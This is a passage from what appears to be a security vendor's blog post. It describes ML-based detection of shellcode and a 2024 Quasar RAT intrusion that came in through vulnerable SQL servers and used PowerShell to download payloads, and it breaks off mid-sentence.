Comment
Author: Admin | 2025-04-28
ShellcodeWhen analyzing the shellcode, a human malware analyst may notice that the malicious code is searching for the MZ and PE headers, indicative of Windows executable files. However, building a native detection system based solely on these patterns would result in numerous false positives in a production environment.Our ML model goes beyond these obvious indicators. It incorporates additional, seemingly unrelated conditions that might not make immediate sense to a human analyst.By analyzing complex patterns and correlations within the data, the model generates highly accurate prevention rules. This advanced approach ensures the effective detection of shellcode with minimal false positives.Figure 4. End user notification for the prevention of the initial loaderSecond Use Case - Quasar RAT Leveraging ShellcodeQuasar RAT is an open source .NET malware that is used by a variety of threat actors.Over the past few years, the malware was reported being distributed using different methods, including via other malware and exploitation of vulnerable and unpatched internet-facing servers and applications.In May 2024, we investigated a Quasar RAT infection, whose infection vector was the exploitation of vulnerable SQL servers. In this case, the attacker used PowerShell to download different components including binaries, scripts and configuration files from a known Quasar RAT command and control (C2) server. The certificate of this C2 can be seen in Figure 5 below.Figure 5. Quasar RAT’s certificate used for the command and control serverThe payloads that were delivered in this campaign were saved in the compromised environment under the path C:\Users\Public and then executed. All of
Add Comment